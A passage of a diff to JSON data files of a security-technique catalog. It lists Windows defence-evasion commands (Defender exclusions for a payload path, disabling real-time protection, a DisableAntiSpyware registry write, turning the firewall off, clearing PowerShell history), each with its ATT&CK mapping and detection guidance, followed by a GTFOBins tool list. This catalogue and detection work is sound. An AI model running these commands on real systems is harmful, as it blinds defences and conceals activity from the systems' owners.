'C:\\Windows\\Temp\\x'\nAdd-MpPreference -ExclusionProcess 'C:\\Windows\\Temp\\x\\payload.exe'\nAdd-MpPreference -ExclusionExtension 'exe'","description":"The Defender module's Add-MpPreference cmdlet adds entries to the Microsoft Defender Antivirus exclusion list so matching items are no longer scanned in real time or on schedule: -ExclusionPath excludes a folder/file, -ExclusionProcess excludes any files opened by a named process, and -ExclusionExtension excludes an entire file type. Any of the three carves a blind spot for staging and executing tooling.","usecase":"Carve a Defender blind spot by excluding a staging path, an attacker process, or a whole extension before dropping tooling.","mitre":["T1562.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Monitor Defender Operational Event ID 5007 (configuration changed) and registry writes under HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\{Paths|Processes|Extensions} (Sysmon 13). Capture Add-MpPreference via Script Block Logging (4104) and alert on any new exclusion, especially paths/processes in Temp/AppData/ProgramData and extension-wide exclusions (rarely legitimate on endpoints). Enable Tamper Protection and centrally alert on exclusion drift."}],"references":["https://attack.mitre.org/techniques/T1562/001/","https://learn.microsoft.com/en-us/powershell/module/defender/add-mppreference"],"added":true,"verifyNote":"MERGED from three near-duplicate Add-MpPreference exclusion entries (same toolId + same command intent — adding a Defender AV exclusion, all T1562.001). MS Learn confirms -ExclusionPath ('disables Windows Defender scheduled and real-time scanning for files in this folder'), -ExclusionProcess ('excludes any files opened by the processes that you specify'), and -ExclusionExtension ('exclude from scheduled, custom, and real-time scanning'); the three write to the Exclusions Paths/Processes/Extensions registry subkeys respectively. Technique mapping unchanged."},{"id":"daemon:powershell:40","toolId":"daemon:powershell","toolName":"Set-MpPreference","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Impair Defenses","Disable or Modify Tools"],"command":"Set-MpPreference -DisableRealtimeMonitoring $true","description":"The Defender module's Set-MpPreference cmdlet with -DisableRealtimeMonitoring $true turns off Microsoft Defender Antivirus real-time protection, stopping on-access scanning of files and processes host-wide.","usecase":"Disable real-time protection so subsequent malicious files execute without being scanned or quarantined.","mitre":["T1562.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Alert on Defender Operational Event ID 5001 (real-time protection disabled) and 5007/5010. Capture 'Set-MpPreference -DisableRealtimeMonitoring' and related '-Disable*' toggles via Script Block Logging (4104). Enable Tamper Protection, which blocks this change and logs the attempt."}],"references":["https://attack.mitre.org/techniques/T1562/001/","https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference"],"added":true,"verifyNote":"MS Learn confirms Set-MpPreference -DisableRealtimeMonitoring (Boolean) governs real-time protection; Defender Operational Event ID 5001 (real-time protection disabled) / 5007 (config changed) confirmed via Microsoft community/Sentinel guidance; ATT&CK T1562.001. No change."},{"id":"daemon:reg:41","toolId":"daemon:reg","toolName":"reg.exe","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Impair Defenses","Modify Registry"],"command":"reg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" /v DisableAntiSpyware /t REG_DWORD /d 1 /f","description":"The built-in reg.exe writes the legacy DisableAntiSpyware policy value to turn off Microsoft Defender Antivirus via the registry. Modern Windows blocks or ignores this value under Tamper Protection, but the write attempt itself is a well-known evasion indicator.","usecase":"Attempt to disable Defender through a policy registry key rather than the Defender cmdlets.","mitre":["T1562.001","T1112"],"privilege":"admin","detection":[{"type":"Detection","value":"Monitor registry writes to HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware (Sysmon 13) and process creation for reg.exe targeting that key. Tamper Protection generates Defender Event ID 5007 on the blocked attempt; treat any DisableAntiSpyware write as malicious on managed endpoints."}],"references":["https://attack.mitre.org/techniques/T1562/001/","https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-disableantispyware"],"added":true,"verifyNote":"MS Learn DisableAntiSpyware doc confirms the value disables Defender AV and that it is now ignored/removed on modern Windows and protected by Tamper Protection (platform 4.18.2108.4+) - matching the entry's caveat; reg.exe add /v /t REG_DWORD /d /f is standard; ATT&CK T1562.001 + T1112. No change."},{"id":"daemon:netsh:42","toolId":"daemon:netsh","toolName":"netsh.exe","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Impair Defenses","Disable or Modify System Firewall"],"command":"netsh advfirewall set allprofiles state off","description":"The built-in netsh advfirewall context sets the state of all Windows Defender Firewall profiles (Domain, Private, Public) to off, removing host-based network controls that would otherwise limit inbound/outbound activity.","usecase":"Turn off the host firewall to allow attacker tooling, C2, or lateral-movement traffic unimpeded.","mitre":["T1562.004"],"privilege":"admin","detection":[{"type":"Detection","value":"Log process creation (Sysmon 1 / 4688) for netsh.exe with 'advfirewall' and 'state off'. Alert on Windows Firewall Event ID 2003 (a firewall setting was changed) and 2009. Also watch sc.exe/net.exe targeting the MpsSvc service. Enforce firewall state centrally via GPO/Intune and alert on drift."}],"references":["https://attack.mitre.org/techniques/T1562/004/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/netsh-advfirewall"],"added":true,"verifyNote":"MS Learn netsh-advfirewall doc confirms 'netsh advfirewall set [allprofiles|...] state <on|off|notconfigured>' where off 'Disables the firewall'; Windows Firewall Event ID 2003 (profile setting changed) confirmed; ATT&CK T1562.004. No change."},{"id":"daemon:byovd:43","toolId":"daemon:byovd","toolName":"BYOVD (vulnerable driver)","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion","Privilege Escalation"],"nativeCategory":["Impair Defenses","Bring Your Own Vulnerable Driver"],"command":"# BYOVD is documented here as a NAMED concept only. No exploitation steps are provided. Reference the LOLDrivers catalog for known-vulnerable signed drivers and the vendor blocklist for defensive coverage.","description":"Bring Your Own Vulnerable Driver (BYOVD) is a named, publicly-documented class of technique in which an adversary who already holds local administrator rights loads a legitimately signed but known-vulnerable kernel driver, then abuses that driver's flaw to gain kernel-mode code execution and disable or blind EDR/AV. This entry catalogs the concept and detection surface only; it contains no driver-exploitation procedure.","usecase":"Understand and detect kernel-level tampering where a signed vulnerable driver is used to kill or blind security tooling.","mitre":["T1068","T1562.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Monitor Sysmon Event ID 6 (driver loaded) and Security 4697/System 7045 (new kernel-mode service) for drivers matching LOLDrivers hashes/signatures or loading from user-writable paths. Enforce the Microsoft Vulnerable Driver Blocklist and WDAC/HVCI to block known-bad drivers. Alert on unexpected drivers signed by unrelated third parties on servers/workstations."}],"references":["https://attack.mitre.org/techniques/T1068/","https://www.loldrivers.io/"],"added":true,"verifyNote":"Concept-only (no exploit steps); LOLDrivers.io is the canonical public catalog of known-vulnerable signed drivers and ATT&CK T1068 (Exploitation for Priv-Esc) + T1562.001 map to BYOVD; Sysmon 6 / Security 4697 / System 7045 detection is accurate. No change."},{"id":"daemon:powershell:44","toolId":"daemon:powershell","toolName":"Clear-History","name":"Indicator Removal","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Indicator Removal","Clear Command History"],"command":"Clear-History; Remove-Item (Get-PSReadlineOption).HistorySavePath","description":"Clear-History flushes the current PowerShell session's in-memory history, while deleting the PSReadLine save path (ConsoleHost_history.txt) removes the persistent, cross-session command history; Set-PSReadLineOption -HistorySaveStyle SaveNothing disables future history writes. Together these hide the commands an operator ran.","usecase":"Erase both session and persistent PowerShell command history to conceal executed commands.","mitre":["T1070.003"],"privilege":"user","detection":[{"type":"Detection","value":"Capture Script Block Logging (4104) for 'Clear-History', 'Remove-Item ...HistorySavePath', '(Get-PSReadlineOption).HistorySavePath', and 'Set-PSReadLineOption -HistorySaveStyle SaveNothing'. Alert when ConsoleHost_history.txt is deleted, emptied, or truncated (file-audit / Sysmon 23 file-delete). Prefer transcript logging and central forwarding, which survive local history deletion."}],"references":["https://attack.mitre.org/techniques/T1070/003/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"],"added":true,"verifyNote":"MS Learn confirms Set-PSReadLineOption -HistorySaveStyle SaveNothing ('Don't use a history file') and HistorySavePath ($($Host.Name)_history.txt, e.g. ConsoleHost_history.txt); Clear-History is a built-in cmdlet; Atomic Red Team T1070.003 documents the technique (also corroborated by Black Hills InfoSec write-up); ATT&CK T1070.003. No change."}] +\ No newline at end of file diff --git a/src/data/tools.json b/src/data/tools.json @@ -1 +1 @@ -[{"id":"gtfo:7z","name":"7z","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/7z/"],"count":2},{"id":"gtfo:R","name":"R","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/R/"],"count":3},{"id":"gtfo:aa-exec","name":"aa-exec","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/aa-exec/"],"count":3},{"id":"gtfo:ab","name":"ab","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ab/"],"count":6},{"id":"gtfo:acr","name":"acr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/acr/"],"count":3},{"id":"gtfo:agetty","name":"agetty","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/agetty/"],"count":1},{"id":"gtfo:alpine","name":"alpine","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/alpine/"],"count":3},{"id":"gtfo:ansible-playbook","name":"ansible-playbook","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ansible-playbook/"],"count":2},{"id":"gtfo:ansible-test","name":"ansible-test","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ansible-test/"],"count":2},{"id":"gtfo:aoss","name":"aoss","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/aoss/"],"count":2},{"id":"gtfo:apache2","name":"apache2","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/apache2/"],"count":6},{"id":"gtfo:apache2ctl","name":"apache2ctl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/apache2ctl/"],"count":2},{"id":"gtfo:apport-cli","name":"apport-cli","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/apport-cli/"],"count":1},{"id":"gtfo:apt-get","name":"apt-get","source":"GTFOBins","platform":["Linux"],"aliases":["apt"],"references":["https://gtfobins.github.io/gtfobins/apt-get/"],"count":6},{"id":"gtfo:aptitude","name":"aptitude","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/aptitude/"],"count":2},{"id":"gtfo:ar","name":"ar","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ar/"],"count":3},{"id":"gtfo:arch-nspawn","name":"arch-nspawn","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/arch-nspawn/"],"count":1},{"id":"gtfo:aria2c","name":"aria2c","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/aria2c/"],"count":12},{"id":"gtfo:arj","name":"arj","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/arj/"],"count":6},{"id":"gtfo:arp","name":"arp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/arp/"],"count":3},{"id":"gtfo:as","name":"as","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/as/"],"count":3},{"id":"gtfo:ascii-xfr","name":"ascii-xfr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ascii-xfr/"],"count":3},{"id":"gtfo:ascii85","name":"ascii85","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ascii85/"],"count":2},{"id":"gtfo:ash","name":"ash","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ash/"],"count":6},{"id":"gtfo:aspell","name":"aspell","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/aspell/"],"count":6},{"id":"gtfo:asterisk","name":"asterisk","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/asterisk/"],"count":3},{"id":"gtfo:at","name":"at","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/at/"],"count":4},{"id":"gtfo:atobm","name":"atobm","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/atobm/"],"count":3},{"id":"gtfo:autoconf","name":"autoconf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/autoconf/"],"count":2},{"id":"gtfo:autoheader","name":"autoheader","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/autoheader/"],"count":2},{"id":"gtfo:autoreconf","name":"autoreconf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/autoreconf/"],"count":2},{"id":"gtfo:aws","name":"aws","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/aws/"],"count":5},{"id":"gtfo:base32","name":"base32","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/base32/"],"count":3},{"id":"gtfo:base58","name":"base58","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/base58/"],"count":2},{"id":"gtfo:base64","name":"base64","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/base64/"],"count":3},{"id":"gtfo:basenc","name":"basenc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/basenc/"],"count":3},{"id":"gtfo:basez","name":"basez","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/basez/"],"count":3},{"id":"gtfo:bash","name":"bash","source":"GTFOBins","platform":["Linux","macOS"],"aliases":["ksh"],"references":["https://gtfobins.github.io/gtfobins/bash/"],"count":33},{"id":"gtfo:bashbug","name":"bashbug","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bashbug/"],"count":2},{"id":"gtfo:batcat","name":"batcat","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/batcat/"],"count":3},{"id":"gtfo:bbot","name":"bbot","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bbot/"],"count":2},{"id":"gtfo:bc","name":"bc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bc/"],"count":3},{"id":"gtfo:bconsole","name":"bconsole","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bconsole/"],"count":5},{"id":"gtfo:bee","name":"bee","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bee/"],"count":3},{"id":"gtfo:borg","name":"borg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/borg/"],"count":2},{"id":"gtfo:bpftrace","name":"bpftrace","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bpftrace/"],"count":3},{"id":"gtfo:bridge","name":"bridge","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bridge/"],"count":3},{"id":"gtfo:bundle","name":"bundle","source":"GTFOBins","platform":["Linux"],"aliases":["bundler"],"references":["https://gtfobins.github.io/gtfobins/bundle/"],"count":10},{"id":"gtfo:busctl","name":"busctl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/busctl/"],"count":9},{"id":"gtfo:busybox","name":"busybox","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/busybox/"],"count":8},{"id":"gtfo:byebug","name":"byebug","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/byebug/"],"count":2},{"id":"gtfo:bzip2","name":"bzip2","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bzip2/"],"count":3},{"id":"gtfo:cabal","name":"cabal","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cabal/"],"count":3},{"id":"gtfo:cancel","name":"cancel","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cancel/"],"count":3},{"id":"gtfo:capsh","name":"capsh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/capsh/"],"count":3},{"id":"gtfo:cargo","name":"cargo","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cargo/"],"count":2},{"id":"gtfo:cat","name":"cat","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cat/"],"count":3},{"id":"gtfo:cdist","name":"cdist","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cdist/"],"count":2},{"id":"gtfo:certbot","name":"certbot","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/certbot/"],"count":2},{"id":"gtfo:chattr","name":"chattr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/chattr/"],"count":2},{"id":"gtfo:check_by_ssh","name":"check_by_ssh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_by_ssh/"],"count":2},{"id":"gtfo:check_cups","name":"check_cups","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_cups/"],"count":2},{"id":"gtfo:check_log","name":"check_log","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_log/"],"count":4},{"id":"gtfo:check_memory","name":"check_memory","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_memory/"],"count":2},{"id":"gtfo:check_raid","name":"check_raid","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_raid/"],"count":2},{"id":"gtfo:check_ssl_cert","name":"check_ssl_cert","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_ssl_cert/"],"count":2},{"id":"gtfo:check_statusfile","name":"check_statusfile","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_statusfile/"],"count":2},{"id":"gtfo:chmod","name":"chmod","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/chmod/"],"count":2},{"id":"gtfo:choom","name":"choom","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/choom/"],"count":3},{"id":"gtfo:chown","name":"chown","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/chown/"],"count":2},{"id":"gtfo:chroot","name":"chroot","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/chroot/"],"count":2},{"id":"gtfo:chrt","name":"chrt","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/chrt/"],"count":3},{"id":"gtfo:clamscan","name":"clamscan","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/clamscan/"],"count":3},{"id":"gtfo:clisp","name":"clisp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/clisp/"],"count":3},{"id":"gtfo:cmake","name":"cmake","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cmake/"],"count":4},{"id":"gtfo:cmp","name":"cmp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cmp/"],"count":3},{"id":"gtfo:cobc","name":"cobc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cobc/"],"count":3},{"id":"gtfo:code","name":"code","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/code/"],"count":6},{"id":"gtfo:codex","name":"codex","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/codex/"],"count":2},{"id":"gtfo:column","name":"column","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/column/"],"count":3},{"id":"gtfo:comm","name":"comm","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/comm/"],"count":3},{"id":"gtfo:composer","name":"composer","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/composer/"],"count":2},{"id":"gtfo:cowsay","name":"cowsay","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cowsay/"],"count":2},{"id":"gtfo:cowthink","name":"cowthink","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cowthink/"],"count":2},{"id":"gtfo:cp","name":"cp","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cp/"],"count":10},{"id":"gtfo:cpan","name":"cpan","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cpan/"],"count":2},{"id":"gtfo:cpio","name":"cpio","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cpio/"],"count":10},{"id":"gtfo:cpulimit","name":"cpulimit","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cpulimit/"],"count":3},{"id":"gtfo:crash","name":"crash","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/crash/"],"count":5},{"id":"gtfo:crontab","name":"crontab","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/crontab/"],"count":4},{"id":"gtfo:csh","name":"csh","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/csh/"],"count":6},{"id":"gtfo:csplit","name":"csplit","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/csplit/"],"count":6},{"id":"gtfo:csvtool","name":"csvtool","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/csvtool/"],"count":9},{"id":"gtfo:ctr","name":"ctr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ctr/"],"count":2},{"id":"gtfo:cupsfilter","name":"cupsfilter","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cupsfilter/"],"count":3},{"id":"gtfo:curl","name":"curl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/curl/"],"count":21},{"id":"gtfo:cut","name":"cut","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cut/"],"count":3},{"id":"gtfo:dash","name":"dash","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dash/"],"count":6},{"id":"gtfo:date","name":"date","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/date/"],"count":3},{"id":"gtfo:dc","name":"dc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dc/"],"count":3},{"id":"gtfo:dd","name":"dd","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dd/"],"count":6},{"id":"gtfo:debugfs","name":"debugfs","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/debugfs/"],"count":3},{"id":"gtfo:dhclient","name":"dhclient","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dhclient/"],"count":2},{"id":"gtfo:dialog","name":"dialog","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dialog/"],"count":3},{"id":"gtfo:diff","name":"diff","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/diff/"],"count":6},{"id":"gtfo:dig","name":"dig","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dig/"],"count":3},{"id":"gtfo:distcc","name":"distcc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/distcc/"],"count":3},{"id":"gtfo:dmesg","name":"dmesg","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dmesg/"],"count":6},{"id":"gtfo:dmidecode","name":"dmidecode","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dmidecode/"],"count":1},{"id":"gtfo:dmsetup","name":"dmsetup","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dmsetup/"],"count":3},{"id":"gtfo:dnf","name":"dnf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dnf/"],"count":1},{"id":"gtfo:dnsmasq","name":"dnsmasq","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dnsmasq/"],"count":3},{"id":"gtfo:doas","name":"doas","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/doas/"],"count":2},{"id":"gtfo:docker","name":"docker","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/docker/"],"count":12},{"id":"gtfo:dos2unix","name":"dos2unix","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dos2unix/"],"count":6},{"id":"gtfo:dosbox","name":"dosbox","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dosbox/"],"count":9},{"id":"gtfo:dotnet","name":"dotnet","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dotnet/"],"count":4},{"id":"gtfo:dpkg","name":"dpkg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dpkg/"],"count":4},{"id":"gtfo:dstat","name":"dstat","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dstat/"],"count":2},{"id":"gtfo:dvips","name":"dvips","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dvips/"],"count":3},{"id":"gtfo:easy_install","name":"easy_install","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/easy_install/"],"count":2},{"id":"gtfo:easyrsa","name":"easyrsa","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/easyrsa/"],"count":3},{"id":"gtfo:eb","name":"eb","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/eb/"],"count":2},{"id":"gtfo:ed","name":"ed","source":"GTFOBins","platform":["Linux","macOS"],"aliases":["red"],"references":["https://gtfobins.github.io/gtfobins/ed/"],"count":9},{"id":"gtfo:efax","name":"efax","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/efax/"],"count":2},{"id":"gtfo:egrep","name":"egrep","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/egrep/"],"count":3},{"id":"gtfo:elvish","name":"elvish","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/elvish/"],"count":9},{"id":"gtfo:emacs","name":"emacs","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/emacs/"],"count":6},{"id":"gtfo:enscript","name":"enscript","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/enscript/"],"count":3},{"id":"gtfo:env","name":"env","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/env/"],"count":3},{"id":"gtfo:eqn","name":"eqn","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/eqn/"],"count":3},{"id":"gtfo:espeak","name":"espeak","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/espeak/"],"count":3},{"id":"gtfo:ex","name"